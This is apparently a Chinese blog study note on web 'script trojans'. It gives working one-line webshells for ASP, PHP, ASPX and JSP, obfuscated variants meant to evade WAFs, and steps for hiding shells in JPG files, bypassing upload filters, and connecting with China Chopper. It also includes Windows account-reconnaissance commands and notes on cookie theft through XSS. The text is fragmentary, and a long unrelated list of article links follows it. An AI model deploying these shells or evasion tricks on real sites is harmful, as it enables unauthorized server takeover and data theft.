脚本木马学习
一句话木啊基础
短,小,强,隐蔽好,powerful,2333333,基于B/S
<%execute request("value")%>
execute是参数
eval是来执行参数的
对于网站来说,要对用上马即支持的运行环境,(iis支持asp、aspx、php),asp无权调用cmd,aspx有
asp一句话
<%eval request("c")%>
一般用都是request的值=命令
php一句话
<>php
@eval($_POST[value]);?>
aspx一句话
<%@
Page Language="jscrit"%>
或者
<%@
eval(Request.Item["value"])%>
jsp
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>
变形
双重的request的使用
<?php
$_REQUEST['dd']($_REQUEST['chneyouxiu']);?>
对于两个参数,执行可以?a=eval然后就又变成了原本的一句话,可以过掉一些早些年的waf
也可以连菜刀
也可以通过eval来构造查看代码
?a=eval&chenyouxiu=phpinfo();
减少闭合情况的
<eval(Request(chr(112)))%>
没有单引号,双引号,防止转义在一些情况下
request用chr并且加上自己的value
<%eval (eval(chr(114)+chr(101)+chr(117)+。。。。。。)("chenyouxiu"))%>
这是asp的
php拼接用点,asp用加号
等
一句话木马的制作
基本的
通过c32进行在左面上传各种一句话,为了防止网站只运行一种,最好都加
然后上传,bp截断,更改,文件都在相对路径下
还有用
cmd
做
copy /b 1.jpg+1.asp 2.jpg
还有
图片属性得版权内插
能支持aspx 百分之8/90支持asp
dos语句的使用
这是管理员权限
user query
看有无管理员上线
net user
查看账户
net localgroup administrators
查看管理员权限
然后学习cacls更改权限
指定安装一些文件,也是管理员下
setp 绝对路径文件
小马
小马只能上传文件,但隐蔽性也好
假如小马为x.asp
然后输密码登录
然后穿大马
ps:asp下也是asp文件得马,不能错了
然后创一个新的asp文件
然后输入
获取权限...
但基本不行了,23333,版本老了
思路想法:上小马,然后指定目录再上大马,有点麻烦,还不如直接上大马...
但这样的一般都有后门...**************
这个xx.asp可以使用爆破bp(弱口令),也可以尝试进程丢失,爆出密码
?profile=a
大马
功能多,50k以上,还有的用还有后门....
执行能力强,但不加密会被报毒
一句话使用
asp
数据库是as格式得网站,在留言板,或发表文章添加一句话,或加到asp网页
最后还是把
<%execute request("value")%>
文件包含马
上传jpg图片,然后根据jpg得上传名字,因为过掉一些waf,在上传asp得引用,直接访问asp即可
<!--#include file="a.jpg" -->
jsp
首先要开启tomcat服务,然后上传服务端代码,然后确定服务地址,打开,然后上传大马
然后用菜刀2014得custom
然后上传
然后菜刀...
模式为customize,然后编码为utf-8
webshell后门查询
通过k
firebug查看元素
查看发送地址...
看网络得发送请求包
也可wireshark
然后通过地址访问...
可以更改
审计可得
然后黑吃黑
xss获取cookie,然后进行对方登录后台查看,获取cookie
然后用小马哥强注
原文地址:https://www.cnblogs.com/chenyouxiu/p/15037008.html
- Spring Boot中使用Flyway来管理数据库版本
- 缓存穿透、缓存并发、热点缓存之最佳招式
- 【译】Spring 官方教程:使用 Restdocs 创建 API 文档
- c#中设置快捷键
- 程序员你为什么这么累【续】:编码习惯之工具类规范
- IntelliJ IDEA 复杂的重构技巧
- 打造属于自己的支持版本迭代的Asp.Net Web Api Route
- 分布式消息队列 RocketMQ 源码分析 —— Message 拉取与消费(上)
- 分布式消息队列 RocketMQ 源码分析 —— Message 拉取与消费(下)
- Spring Boot中使用RabbitMQ
- Spring Cloud构建微服务架构:消息驱动的微服务(入门)【Dalston版】
- 哪类人适合当产品经理?
- 产品经理·杂谈
- Python机器学习中的特征选择
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- laravel批量生成假数据的方法
- 对laravel in 查询的使用方法详解
- PHP使用redis位图bitMap 实现签到功能
- thinkphp5+layui实现的分页样式示例
- Laravel实现搜索的时候分页并携带参数
- PHP7.3.10编译安装教程
- Laravel-添加后台模板AdminLte的实现方法
- PHP7 安装event扩展的实现方法
- 在laravel框架中使用model层的方法
- 漂亮的thinkphp 跳转页封装示例
- thinkphp5框架前后端分离项目实现分页功能的方法分析
- laravel 根据不同组织加载不同视图的实现
- 详解将数据从Laravel传送到vue的四种方式
- Laravel实现ApiToken认证请求
- laravel 实现划分admin和home 模块分组